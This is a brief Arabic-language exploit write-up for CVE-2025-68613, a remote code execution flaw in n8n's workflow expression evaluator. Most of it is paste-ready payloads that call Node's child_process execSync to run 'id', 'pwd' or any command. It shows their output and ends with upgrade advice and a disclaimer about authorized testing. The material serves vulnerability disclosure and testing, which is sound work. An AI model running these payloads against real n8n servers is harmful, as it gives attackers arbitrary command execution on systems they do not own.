
CVE-2025-68613: استغلال ثغرة RCE في n8n وتوثيقها
تحتوي n8n على ثغرة حرجة لتنفيذ الأكواد التعسفي (Arbitrary Code Execution) في نظام تقييم تعبيرات سير العمل. في ظل ظروف معينة، قد يتم تقييم التعبيرات التي يقدمها المستخدمون المُصادَق عليهم أثناء تكوين سير العمل في سياق تنفيذ غير معزول بما يكفي عن بيئة التشغيل الأساسية.
الصق هذه الحمولة في حقل التعبير:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

أمر ID:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}
أمر PWD:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString() })() }}
قالب أمر مخصص:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('COMMAND').toString() })() }}
لأمر id:
uid=1000(node) gid=1000(node) groups=1000(node)
لأمر pwd:
/app
يفتقر مُقيّم التعبيرات إلى مُنقٍّ (sanitizer) يمنع تعبيرات الدوال من الوصول إلى this.process (كائن العملية في Node.js)، مما يسمح بالوصول إلى وحدات النظام.
قم بالترقية إلى n8n v1.122.0 أو أحدث.
إخلاء مسؤولية: تُقدَّم هذه المعلومات لأغراض الاختبار في بيئات معزولة والتعليم فقط. الاستخدام غير المصرح به لهذه المعلومات لاستغلال الأنظمة غير قانوني وغير أخلاقي. احرص دائمًا على الحصول على إذن مناسب قبل اختبار الثغرات أو استغلالها.